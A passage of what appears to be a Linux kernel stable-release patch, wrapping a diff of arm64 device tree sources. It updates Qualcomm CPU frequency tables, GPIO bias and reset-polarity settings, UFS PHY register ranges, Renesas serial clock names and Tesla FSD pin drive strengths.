++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-979200000 {
++			opp-hz = /bits/ 64 <979200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1056000000 {
++			opp-hz = /bits/ 64 <1056000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1132800000 {
++			opp-hz = /bits/ 64 <1132800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1209600000 {
++			opp-hz = /bits/ 64 <1209600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1286400000 {
++			opp-hz = /bits/ 64 <1286400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1363200000 {
++			opp-hz = /bits/ 64 <1363200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1440000000 {
++			opp-hz = /bits/ 64 <1440000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1516800000 {
++			opp-hz = /bits/ 64 <1516800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1593600000 {
++			opp-hz = /bits/ 64 <1593600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1996800000 {
++			opp-hz = /bits/ 64 <1996800000>;
++			opp-supported-hw = <0x20>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2188800000 {
++			opp-hz = /bits/ 64 <2188800000>;
++			opp-supported-hw = <0x10>;
++			clock-latency-ns = <200000>;
++		};
++	};
++
++	cluster1_opp: opp-table-cluster1 {
++		compatible = "operating-points-v2-kryo-cpu";
++		nvmem-cells = <&speedbin_efuse>;
++		opp-shared;
++
++		opp-307200000 {
++			opp-hz = /bits/ 64 <307200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-384000000 {
++			opp-hz = /bits/ 64 <384000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-460800000 {
++			opp-hz = /bits/ 64 <460800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-537600000 {
++			opp-hz = /bits/ 64 <537600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-614400000 {
++			opp-hz = /bits/ 64 <614400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-691200000 {
++			opp-hz = /bits/ 64 <691200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-748800000 {
++			opp-hz = /bits/ 64 <748800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-825600000 {
++			opp-hz = /bits/ 64 <825600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-902400000 {
++			opp-hz = /bits/ 64 <902400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-979200000 {
++			opp-hz = /bits/ 64 <979200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1056000000 {
++			opp-hz = /bits/ 64 <1056000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1132800000 {
++			opp-hz = /bits/ 64 <1132800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1209600000 {
++			opp-hz = /bits/ 64 <1209600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1286400000 {
++			opp-hz = /bits/ 64 <1286400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1363200000 {
++			opp-hz = /bits/ 64 <1363200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1440000000 {
++			opp-hz = /bits/ 64 <1440000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1516800000 {
++			opp-hz = /bits/ 64 <1516800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1593600000 {
++			opp-hz = /bits/ 64 <1593600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1670400000 {
++			opp-hz = /bits/ 64 <1670400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1747200000 {
++			opp-hz = /bits/ 64 <1747200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1824000000 {
++			opp-hz = /bits/ 64 <1824000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1900800000 {
++			opp-hz = /bits/ 64 <1900800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1977600000 {
++			opp-hz = /bits/ 64 <1977600000>;
++			opp-supported-hw = <0x30>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2054400000 {
++			opp-hz = /bits/ 64 <2054400000>;
++			opp-supported-hw = <0x30>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2150400000 {
++			opp-hz = /bits/ 64 <2150400000>;
++			opp-supported-hw = <0x30>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2246400000 {
++			opp-hz = /bits/ 64 <2246400000>;
++			opp-supported-hw = <0x10>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2342400000 {
++			opp-hz = /bits/ 64 <2342400000>;
++			opp-supported-hw = <0x10>;
++			clock-latency-ns = <200000>;
++		};
++	};
++};
+diff --git a/arch/arm64/boot/dts/qcom/pm6350.dtsi b/arch/arm64/boot/dts/qcom/pm6350.dtsi
+index ecf9b99191828..68245d78d2b93 100644
+--- a/arch/arm64/boot/dts/qcom/pm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm6350.dtsi
+@@ -3,6 +3,7 @@
+  * Copyright (c) 2021, Luca Weiss <luca@z3ntu.xyz>
+  */
+ 
++#include <dt-bindings/input/input.h>
+ #include <dt-bindings/spmi/spmi.h>
+ 
+ &spmi_bus {
+diff --git a/arch/arm64/boot/dts/qcom/pm660.dtsi b/arch/arm64/boot/dts/qcom/pm660.dtsi
+index e1622b16c08bd..02a69ac0149b2 100644
+--- a/arch/arm64/boot/dts/qcom/pm660.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm660.dtsi
+@@ -163,7 +163,7 @@
+ 				qcom,pre-scaling = <1 3>;
+ 			};
+ 
+-			vcoin: vcoin@83 {
++			vcoin: vcoin@85 {
+ 				reg = <ADC5_VCOIN>;
+ 				qcom,decimation = <1024>;
+ 				qcom,pre-scaling = <1 3>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi
+index 1bd6c7dcd9e91..bfab67f4a7c9c 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi
+@@ -194,6 +194,12 @@ ap_ts_pen_1v8: &i2c4 {
+ 		pins = "gpio49", "gpio50", "gpio51", "gpio52";
+ 		function = "mi2s_1";
+ 	};
++
++	pinconf {
++		pins = "gpio49", "gpio50", "gpio51", "gpio52";
++		drive-strength = <2>;
++		bias-pull-down;
++	};
+ };
+ 
+ &ts_reset_l {
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-idp.dts b/arch/arm64/boot/dts/qcom/sc7280-idp.dts
+index 7559164cdda08..e2e37a0292ad6 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-idp.dts
++++ b/arch/arm64/boot/dts/qcom/sc7280-idp.dts
+@@ -10,7 +10,6 @@
+ #include <dt-bindings/iio/qcom,spmi-adc7-pmr735a.h>
+ #include "sc7280-idp.dtsi"
+ #include "pmr735a.dtsi"
+-#include "sc7280-herobrine-lte-sku.dtsi"
+ 
+ / {
+ 	model = "Qualcomm Technologies, Inc. sc7280 IDP SKU1 platform";
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+index cd432a2856a7b..ca50f0ba9b815 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+@@ -13,6 +13,7 @@
+ #include "pmk8350.dtsi"
+ 
+ #include "sc7280-chrome-common.dtsi"
++#include "sc7280-herobrine-lte-sku.dtsi"
+ 
+ / {
+ 	aliases {
+@@ -34,7 +35,7 @@
+ 		pinctrl-0 = <&wcd_reset_n>;
+ 		pinctrl-1 = <&wcd_reset_n_sleep>;
+ 
+-		reset-gpios = <&tlmm 83 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&tlmm 83 GPIO_ACTIVE_LOW>;
+ 
+ 		qcom,rx-device = <&wcd_rx>;
+ 		qcom,tx-device = <&wcd_tx>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+index 4b8c676b0bb19..f7665b3799233 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+@@ -37,7 +37,7 @@
+ 		pinctrl-0 = <&wcd_reset_n>, <&us_euro_hs_sel>;
+ 		pinctrl-1 = <&wcd_reset_n_sleep>, <&us_euro_hs_sel>;
+ 
+-		reset-gpios = <&tlmm 83 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&tlmm 83 GPIO_ACTIVE_LOW>;
+ 		us-euro-gpios = <&tlmm 81 GPIO_ACTIVE_HIGH>;
+ 
+ 		qcom,rx-device = <&wcd_rx>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm630.dtsi b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+index b51b85f583e5d..e119060ac56cb 100644
+--- a/arch/arm64/boot/dts/qcom/sdm630.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+@@ -779,7 +779,7 @@
+ 					pins = "gpio17", "gpio18", "gpio19";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+-					bias-no-pull;
++					bias-disable;
+ 				};
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+index b5eb8f7eca1d5..b5f11fbcc3004 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+@@ -1436,7 +1436,7 @@ ap_ts_i2c: &i2c14 {
+ 		config {
+ 			pins = "gpio126";
+ 			function = "gpio";
+-			bias-no-pull;
++			bias-disable;
+ 			drive-strength = <2>;
+ 			output-low;
+ 		};
+@@ -1446,7 +1446,7 @@ ap_ts_i2c: &i2c14 {
+ 		config {
+ 			pins = "gpio126";
+ 			function = "gpio";
+-			bias-no-pull;
++			bias-disable;
+ 			drive-strength = <2>;
+ 			output-high;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index afc17e4d403fc..f982594896796 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -628,7 +628,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd-intr-default {
+-		pins = "goui54";
++		pins = "gpio54";
+ 		function = "gpio";
+ 		input-enable;
+ 		bias-pull-down;
+diff --git a/arch/arm64/boot/dts/qcom/sm6125.dtsi b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+index 1fe3fa3ad8770..7818fb6c5a10a 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+@@ -458,7 +458,7 @@
+ 		sdhc_1: mmc@4744000 {
+ 			compatible = "qcom,sm6125-sdhci", "qcom,sdhci-msm-v5";
+ 			reg = <0x04744000 0x1000>, <0x04745000 0x1000>;
+-			reg-names = "hc", "core";
++			reg-names = "hc", "cqhci";
+ 
+ 			interrupts = <GIC_SPI 348 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 352 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index c39de7d3ace0b..7be5fc8dec671 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -485,6 +485,7 @@
+ 			interrupts = <GIC_SPI 641 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 644 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hc_irq", "pwr_irq";
++			iommus = <&apps_smmu 0x60 0x0>;
+ 
+ 			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
+ 				 <&gcc GCC_SDCC1_APPS_CLK>,
+@@ -1063,6 +1064,7 @@
+ 			interrupts = <GIC_SPI 204 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 222 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hc_irq", "pwr_irq";
++			iommus = <&apps_smmu 0x560 0x0>;
+ 
+ 			clocks = <&gcc GCC_SDCC2_AHB_CLK>,
+ 				 <&gcc GCC_SDCC2_APPS_CLK>,
+@@ -1148,15 +1150,11 @@
+ 			dp_phy: dp-phy@88ea200 {
+ 				reg = <0 0x088ea200 0 0x200>,
+ 				      <0 0x088ea400 0 0x200>,
+-				      <0 0x088eac00 0 0x400>,
++				      <0 0x088eaa00 0 0x200>,
+ 				      <0 0x088ea600 0 0x200>,
+-				      <0 0x088ea800 0 0x200>,
+-				      <0 0x088eaa00 0 0x100>;
++				      <0 0x088ea800 0 0x200>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <1>;
+-				clocks = <&gcc GCC_USB3_PRIM_PHY_PIPE_CLK>;
+-				clock-names = "pipe0";
+-				clock-output-names = "usb3_phy_pipe_clk_src";
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index cef8c4f4f0ff2..4a527a64772b4 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -2032,11 +2032,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x16c>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x16c>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-mtp.dts b/arch/arm64/boot/dts/qcom/sm8250-mtp.dts
+index a102aa5efa326..a05fe468e0b41 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-mtp.dts
++++ b/arch/arm64/boot/dts/qcom/sm8250-mtp.dts
+@@ -635,7 +635,7 @@
+ 	wcd938x: codec {
+ 		compatible = "qcom,wcd9380-codec";
+ 		#sound-dai-cells = <1>;
+-		reset-gpios = <&tlmm 32 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&tlmm 32 GPIO_ACTIVE_LOW>;
+ 		vdd-buck-supply = <&vreg_s4a_1p8>;
+ 		vdd-rxtx-supply = <&vreg_s4a_1p8>;
+ 		vdd-io-supply = <&vreg_s4a_1p8>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index 5428aab3058dd..e4769dcfaad7b 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -619,7 +619,7 @@
+ 		pins = "gpio39";
+ 		function = "gpio";
+ 		drive-strength = <2>;
+-		bias-disabled;
++		bias-disable;
+ 		input-enable;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index e276eed1f8e2c..29e352a577311 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -2180,11 +2180,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x16c>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x16c>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+@@ -2455,7 +2455,7 @@
+ 					pins = "gpio7";
+ 					function = "dmic1_data";
+ 					drive-strength = <2>;
+-					pull-down;
++					bias-pull-down;
+ 					input-enable;
+ 				};
+ 			};
+@@ -2892,15 +2892,11 @@
+ 			dp_phy: dp-phy@88ea200 {
+ 				reg = <0 0x088ea200 0 0x200>,
+ 				      <0 0x088ea400 0 0x200>,
+-				      <0 0x088eac00 0 0x400>,
++				      <0 0x088eaa00 0 0x200>,
+ 				      <0 0x088ea600 0 0x200>,
+-				      <0 0x088ea800 0 0x200>,
+-				      <0 0x088eaa00 0 0x100>;
++				      <0 0x088ea800 0 0x200>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <1>;
+-				clocks = <&gcc GCC_USB3_PRIM_PHY_PIPE_CLK>;
+-				clock-names = "pipe0";
+-				clock-output-names = "usb3_phy_pipe_clk_src";
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index a86d9ea93b9d4..a6270d97a3192 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -2142,11 +2142,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x188>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x188>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts
+index d68765eb6d4f9..6351050bc87f2 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts
++++ b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts
+@@ -556,8 +556,6 @@
+ 	pinctrl-1 = <&sdc2_sleep_state &sdc2_card_det_n>;
+ 	vmmc-supply = <&pm8350c_l9>;
+ 	vqmmc-supply = <&pm8350c_l6>;
+-	/* Forbid SDR104/SDR50 - broken hw! */
+-	sdhci-caps-mask = <0x3 0x0>;
+ 	no-sdio;
+ 	no-mmc;
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index d32f08df743d8..32a37c878a34c 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -3161,11 +3161,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x188>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x188>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+@@ -3192,6 +3192,9 @@
+ 			bus-width = <4>;
+ 			dma-coherent;
+ 
++			/* Forbid SDR104/SDR50 - broken hw! */
++			sdhci-caps-mask = <0x3 0x0>;
++
+ 			status = "disabled";
+ 
+ 			sdhc2_opp_table: opp-table {
+diff --git a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+index c2f152bcf10ec..4092c0016035e 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+@@ -577,7 +577,7 @@
+ 			reg = <0 0xe6540000 0 0x60>;
+ 			interrupts = <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 514>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x31>, <&dmac0 0x30>,
+@@ -594,7 +594,7 @@
+ 			reg = <0 0xe6550000 0 0x60>;
+ 			interrupts = <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 515>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x33>, <&dmac0 0x32>,
+@@ -611,7 +611,7 @@
+ 			reg = <0 0xe6560000 0 0x60>;
+ 			interrupts = <GIC_SPI 247 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 516>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x35>, <&dmac0 0x34>,
+@@ -628,7 +628,7 @@
+ 			reg = <0 0xe66a0000 0 0x60>;
+ 			interrupts = <GIC_SPI 248 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 517>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x37>, <&dmac0 0x36>,
+@@ -657,7 +657,7 @@
+ 			reg = <0 0xe6e60000 0 64>;
+ 			interrupts = <GIC_SPI 249 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 702>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x51>, <&dmac0 0x50>,
+@@ -674,7 +674,7 @@
+ 			reg = <0 0xe6e68000 0 64>;
+ 			interrupts = <GIC_SPI 250 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 703>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x53>, <&dmac0 0x52>,
+@@ -691,7 +691,7 @@
+ 			reg = <0 0xe6c50000 0 64>;
+ 			interrupts = <GIC_SPI 252 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 704>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x57>, <&dmac0 0x56>,
+@@ -708,7 +708,7 @@
+ 			reg = <0 0xe6c40000 0 64>;
+ 			interrupts = <GIC_SPI 253 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 705>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x59>, <&dmac0 0x58>,
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+index d70f0600ae5a9..d58b18802cb01 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+@@ -326,7 +326,7 @@
+ 			reg = <0 0xe6540000 0 96>;
+ 			interrupts = <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 514>,
+-				 <&cpg CPG_CORE R8A779G0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779G0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			power-domains = <&sysc R8A779G0_PD_ALWAYS_ON>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a09g011.dtsi b/arch/arm64/boot/dts/renesas/r9a09g011.dtsi
+index fb1a97202c387..ebaa8cdd747d2 100644
+--- a/arch/arm64/boot/dts/renesas/r9a09g011.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a09g011.dtsi
+@@ -48,7 +48,7 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		gic: interrupt-controller@82000000 {
++		gic: interrupt-controller@82010000 {
+ 			compatible = "arm,gic-400";
+ 			#interrupt-cells = <3>;
+ 			#address-cells = <0>;
+@@ -126,7 +126,7 @@
+ 		i2c0: i2c@a4030000 {
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+-			compatible = "renesas,i2c-r9a09g011", "renesas,rzv2m-i2c";
++			compatible = "renesas,r9a09g011-i2c", "renesas,rzv2m-i2c";
+ 			reg = <0 0xa4030000 0 0x80>;
+ 			interrupts = <GIC_SPI 232 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 236 IRQ_TYPE_EDGE_RISING>;
+@@ -140,7 +140,7 @@
+ 		i2c2: i2c@a4030100 {
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+-			compatible = "renesas,i2c-r9a09g011", "renesas,rzv2m-i2c";
++			compatible = "renesas,r9a09g011-i2c", "renesas,rzv2m-i2c";
+ 			reg = <0 0xa4030100 0 0x80>;
+ 			interrupts = <GIC_SPI 234 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 238 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi b/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi
+index d0abb9aa0e9ed..e3852c9463528 100644
+--- a/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi
++++ b/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi
+@@ -55,14 +55,14 @@
+ 		samsung,pins = "gpf5-0";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	ufs_refclk_out: ufs-refclk-out-pins {
+ 		samsung,pins = "gpf5-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ };
+ 
+@@ -239,105 +239,105 @@
+ 		samsung,pins = "gpb6-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
